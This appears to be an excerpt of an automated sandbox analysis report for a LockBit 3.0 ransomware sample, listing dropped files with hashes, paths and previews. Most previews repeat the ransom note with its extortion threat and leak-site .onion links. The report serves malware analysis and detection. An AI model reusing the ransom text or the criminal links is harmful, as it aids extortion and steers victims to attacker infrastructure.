                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Win32WebViewHost_cw5n1h2txyewy\Settings\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Win32WebViewHost_cw5n1h2txyewy\Settings\settings.dat.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):8431
                Entropy (8bit):7.9821280236992544
                Encrypted:false
                SSDEEP:96:Hkbu/iBfcsDt56IIRTyM7kkvV/pSKKeVxPBrTtW2jgGQ5wsnz0ei5I3CAN72GHe9:HkbgjsDtEJCKH3pZj7Q5wTeYIz7o
                MD5:41AC25A004E687DB3DE47042D5CA1254
                SHA1:5166535BEB07C5AD3BD82F9A2080F969F6E43348
                SHA-256:E81C9BC729264AD881E1A958D60215EF663E91D16F92B2DE58DBE6CB880EB616
                SHA-512:A6F6C4E36E178972D49592EF4668BED12B0982E3842F92BF47F41BD8A1120FB52204435ECC409D3E766FEBF0C7E14674B9219C913F11BF09B31147B4AF79ED3E
                Malicious:false
                Preview:B.1]...e.Z..X..>..#]&.<....oI5..`. h..<.G.i[.."^..h.#.7....o'...Y..3....nc.}...;..9t.h.Q7..H.MY.e.Ai.....M..[.....vH....Q7...W.....\.@F.xI<P...^.08.h:w.M./._.7...c.R.W..P.....e.H.d.~}.(!o....}...z.........\.>..>R..xy...m....*....N..7.N.{..y....R.w........I.;.RX......l...tS.B....u$......s...g.0-.BD.h.'..$.L..I .rwS..2N.....e#.A..C X.K@7.O,..6..l.T....B.y.4;......R...B.tu>xjQ...B....:S.hqG......V.N.%.2r}.]Y.R..&...z.A.j.C...}.\..0+..8.O.7.x..[.%........."...Q.;:.mqdBv.dw.l..*.(J..~:d8M......vr_~..b.A.sz...D..uH...o.........1._|... .."....3[.h.@y..$..I.....a.'....n..r.kT..,nA;.f.e.......bC.4...U...9L=...=..S.]&c..{..Lq..s...~Y....7.b..t)/.W...|f.$..<Z.r.6..rH.....;........:...?....2l3...!z+..;...|....4.=;.......?58&Zy.[..._..".d....0...a.|..e.&8-PB).J..r..i.....B.w.....z..[..P.0F...._.....-.*:..s......pu..uI...v..(99\.m1B\m(,z..`...........Xf...T*?.......I._w...........q....1..&mr3Fr........}...R.m.5..#..5..W..j.......?

                C:\Users\user\AppData\Local\Packages\Microsoft.Win32WebViewHost_cw5n1h2txyewy\SystemAppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Win32WebViewHost_cw5n1h2txyewy\TempState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Win32WebViewHost_cw5n1h2txyewy\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\AC\Temp\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\AC\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\AppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\LocalCache\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\LocalState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\RoamingState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\Settings\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\Settings\settings.dat.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):8431
                Entropy (8bit):7.978755138403188
                Encrypted:false
                SSDEEP:192:AodMa3e8RByqf08GICGwkLUubMhttGKouSNXico:Aodh3e8J08QvkUphrouSNK
                MD5:1707B5E38D85A93DB99B71CB4031507F
                SHA1:2EA9CF980CB6D1BE314CF5B10E9A84233FBCED83
                SHA-256:51C5385C5DB97ACDFF353B6218159E496638E9FE1860B25325658582C2921E40
                SHA-512:6FB5A972FD79E98E2281BA92B8A57D93596B3CF665F802011F63969A5EDB9300E19F335145D2367FA5962A74A5BCE071947C32CF1EA8C998C0B10AC6158AE7BE
                Malicious:false
                Preview:0...O.-w...x....Q...%.:.6..X/VJx#..iW..=.<d...W..J..............`..9k........1/....F....*.9.Q....d9.S.......(...t..m.m.U...[..Ez...3..# .-(.8UA......;.T.....n5.....cl..7...]>.8.......!.=.F.p.H:4.>.Y....[...."V...sl...q......../&.....h.N].MZ.l..].......>%.6.......s...Yw..:.....s.....}z.F.7f..EU?.../...j.ZU^..N.c.]......%...M.n.,%.@. ...k2O..g.V.qa.\\.Ng.uQ....p.M[...,.\-.e...0:.(.o9!nM..<.....W.z.]......B...f.G...J..:.Q....(.9fd..%a_.:^...I<0..z)W..L.Y....D.$j.K..o-#.2..X.U..:.@.v5&r.....B.!e.0o.?$..~....(....@......Y.......^Oj....DC'..5...]..9.......3iW...J.........h}w.c_$.f.%.BR....&@.B...f...o.DTP..d...eq!.~.|0l.<.6..>...M...|.,u..h........ePU..q.{qv.....~b.Fg.\..}..v.4.@.!...T....W.P..V...]..VN......yR.RH..{....PZ'...........8E 